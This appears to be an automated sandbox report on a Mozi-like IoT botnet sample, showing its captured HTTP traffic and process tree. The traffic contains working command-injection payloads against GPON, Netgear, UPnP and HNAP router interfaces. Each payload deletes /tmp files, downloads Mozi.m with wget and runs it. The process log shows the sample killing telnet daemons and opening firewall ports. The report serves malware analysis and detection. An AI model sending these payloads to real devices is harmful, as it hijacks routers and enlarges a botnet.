                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          4192.168.2.2043552132.64.170.4580
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:35.667013884 CET450OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                                                                          Host: 127.0.0.1:80
                                                                                                          Connection: keep-alive
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Content-Length: 118
                                                                                                          Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30
                                                                                                          Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                                                                                                          Jan 6, 2021 19:32:35.779067039 CET450INHTTP/1.0 302 Found
                                                                                                          Location: https://127.0.0.1/GponForm/diag_Form?images/
                                                                                                          Server: aws
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Length: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          5192.168.2.2052228139.39.140.2849152
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:39.374828100 CET466OUTPOST /soap.cgi?service=WANIPConn1 HTTP/1.1
                                                                                                          Host: 139.39.140.28:49152
                                                                                                          Content-Length: 630
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                          Accept: */*
                                                                                                          User-Agent: Hello, World
                                                                                                          Connection: keep-alive
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 74 6d 70 3b 72 6d 20 2d 72 66 20 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 2f 74 6d 70 2f 4d 6f 7a 69 2e 6d 20 64 6c 69 6e 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 36 33 34 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 35 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 6d 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 53 4f 41 50 45 4e 56 3a 42 6f 64 79 3e 3c 53 4f 41 50 45 4e 56 3a 65 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
                                                                                                          Jan 6, 2021 19:32:39.521733046 CET467INHTTP/1.1 503 Service Unavailable
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Content-Length: 15312
                                                                                                          Connection: close
                                                                                                          P3P: CP="CAO PSA OUR"
                                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 31 33 39 2e 33 39 2e 31 34 30 2e 32 38 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 23 63 7b 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6d 61 72 67 69 6e 3a 32 30 3b 70 61 64 64 69 6e 67 3a 32 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 0a 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 0a 68 32 2c 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 7d 0a 68 31 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 68 32 7b 63 6f 6c 6f 72 3a 23 33 33 30 30 36 36 3b 7d 0a 68 33 7b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 68 35 7b 6d 61 72 67 69 6e 3a 32 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 36 36 36 3b 7d 0a 62 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 23 63 63 30 30 30 30 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0a 3c 64 69 76 20 69 64 3d 22 63 22 3e 0a 3c 68 31 3e 0a 3c 69 6d 67 20 77 69 64 74 68 3d 22 32 30 30 22 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 67 41 41 5a 41 42 6b 41 41 44 2f 32 77 42 44 41 42 41 4c 43 77 73 4d 43 78 41 4d 44 42 41 58 44 77 30 50 46 78 73 55 45 42 41 55 47 78 38 58 46 78 63 58 46 78 38 65 46 78 6f 61 47 68 6f 58 48 68 34 6a 4a 53 63 6c 49 78 34 76 4c 7a 4d 7a 4c 79 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 32 77 42 44 41 52 45 50 44 78 45 54 45 52 55 53 45 68 55 55 45 52 51 52 46 42 6f 55 46 68 59 55 47 69 59 61 47 68 77 61 47 69 59 77 49 78 34 65 48 68 34 6a 4d 43 73 75 4a 79 63 6e 4c 69 73 31 4e 54 41 77 4e 54 56 41 51 44 39 41 51 45 42 41 51 45 42 41 51 45 42 41 51 45 44 2f 77 41 41 52 43 41 44 43 41 4d 67 44 41 53 49 41 41 68 45 42 41 78 45 42 2f 38 51 41 47 77 41 41 41 51 55 42 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 44 42 41 55 47 41 51 66 2f 78 41 42 4a 45 41 41 43 41 51 4d 43 41 77 51 47 43 41 49 48 42 67 55 46 41 41 41 42 41 67 4d 41 42 42 45 46 45 69 45 78 51 52 4d 69 55 57 45 47 4d 6c 4a 78 63 6f 45 55 49 30 4b 52 6f 62 48 42 30 57 4b 43 46 54 4e 54 6b 71 4c 68 38 43 52 44 63 37 4c 53 38 52 63 30 59 35 50 43 52 46 52 56 68 4b 50 2f 78 41 41 5a 41 51 41 44 41 51 45 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 4d 42 42 41 58 2f 78 41 41 79 45 51 41 43 41 51 4d 43 42 51 49 46 41 77 4d 46 41 41 41 41 41 41 41 42 41 67 41 44 45 53 45 53 4d 52
                                                                                                          Data Ascii: <html><head><title>139.39.140.28</title><style>#c{border:3px solid #aaa;background-color:#fff;margin:20;padding:20;font-family:Tahoma,Helvetica,Arial,sans-serif;font-size:12px;}h1,h2,h3,h4,h5{font-weight:bold;}h2,h3{font-size:20px;}h1{text-align:center;font-size:22px;color:#cc0000;}h2{color:#330066;}h3{color:#666;}h4{font-size:16px;color:#666;}h5{margin:20;text-align:left;font-size:12px;color:#666;}b{font-size:16px;font-weight:bold;color:#cc0000;}</style></head><body bgcolor="#e7e8e9"><div id="c"><h1><img width="200" src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/2wBDABALCwsMCxAMDBAXDw0PFxsUEBAUGx8XFxcXFx8eFxoaGhoXHh4jJSclIx4vLzMzLy9AQEBAQEBAQEBAQEBAQED/2wBDAREPDxETERUSEhUUERQRFBoUFhYUGiYaGhwaGiYwIx4eHh4jMCsuJycnLis1NTAwNTVAQD9AQEBAQEBAQEBAQED/wAARCADCAMgDASIAAhEBAxEB/8QAGwAAAQUBAQAAAAAAAAAAAAAAAAIDBAUGAQf/xABJEAACAQMCAwQGCAIHBgUFAAABAgMABBEFEiExQRMiUWEGMlJxcoEUI0KRobHB0WKCFTNTkqLh8CRDc7LS8Rc0Y5PCRFRVhKP/xAAZAQADAQEBAAAAAAAAAAAAAAAAAgMBBAX/xAAyEQACAQMCBQIFAwMFAAAAAAABAgADESESMR


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          6192.168.2.2033166149.129.130.5880
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:43.459608078 CET598OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:32:43.626579046 CET599INHTTP/1.1 502 Bad Gateway
                                                                                                          Server: nginx/1.4.6 (Ubuntu)
                                                                                                          Date: Wed, 06 Jan 2021 18:32:47 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 181
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 34 2e 36 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.4.6 (Ubuntu)</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          7192.168.2.2044076192.34.60.23680
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:53.356446028 CET642OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:32:53.480268002 CET643INHTTP/1.1 301 Moved Permanently
                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                          Date: Wed, 06 Jan 2021 18:32:53 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 178
                                                                                                          Connection: close
                                                                                                          Location: https://nodedeploy.murilob.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          8192.168.2.205536691.233.85.6680
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:32:57.331496954 CET665OUTGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                                                                                                          Jan 6, 2021 19:32:57.392955065 CET665INHTTP/1.1 404 Not Found
                                                                                                          Date: Wed, 06 Jan 2021 18:32:57 GMT
                                                                                                          Server: Apache (custom)
                                                                                                          Content-Length: 384
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 28 63 75 73 74 6f 6d 29 20 53 65 72 76 65 72 20 61 74 20 66 6c 75 6d 6f 74 6f 2e 64 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache (custom) Server at flumoto.de Port 80</address></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                          9192.168.2.205776092.246.94.25380
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jan 6, 2021 19:33:03.403189898 CET694OUTPOST /HNAP1/ HTTP/1.0
                                                                                                          Host: 92.246.94.253:80
                                                                                                          Content-Type: text/xml; charset="utf-8"
                                                                                                          SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
                                                                                                          Content-Length: 640
                                                                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                                                                                                          Jan 6, 2021 19:33:14.306632996 CET741INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 06 Jan 2021 18:33:03 GMT
                                                                                                          Server: Apache/2.2.15 (CentOS)
                                                                                                          X-Powered-By: PHP/5.3.3
                                                                                                          Content-Length: 0
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                          System Behavior

                                                                                                          Analysis Process: i PID: 4547 Parent PID: 4498

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:/usr/bin/qemu-arm /tmp/i
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4560 Parent PID: 4547

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4562 Parent PID: 4560

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4564 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4564 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4566 Parent PID: 4564

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: killall PID: 4566 Parent PID: 4564

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/usr/bin/killall
                                                                                                          Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                          File size:23736 bytes
                                                                                                          MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                          Analysis Process: i PID: 4583 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4584 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4585 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:09
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: i PID: 4605 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 4605 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4613 Parent PID: 4605

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 4613 Parent PID: 4605

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: iptables PID: 4621 Parent PID: 4613

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:n/a
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: modprobe PID: 4621 Parent PID: 4613

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/modprobe
                                                                                                          Arguments:/sbin/modprobe ip_tables
                                                                                                          File size:9 bytes
                                                                                                          MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                          Analysis Process: i PID: 4658 Parent PID: 4585

                                                                                                          General

                                                                                                          Start time:19:31:24
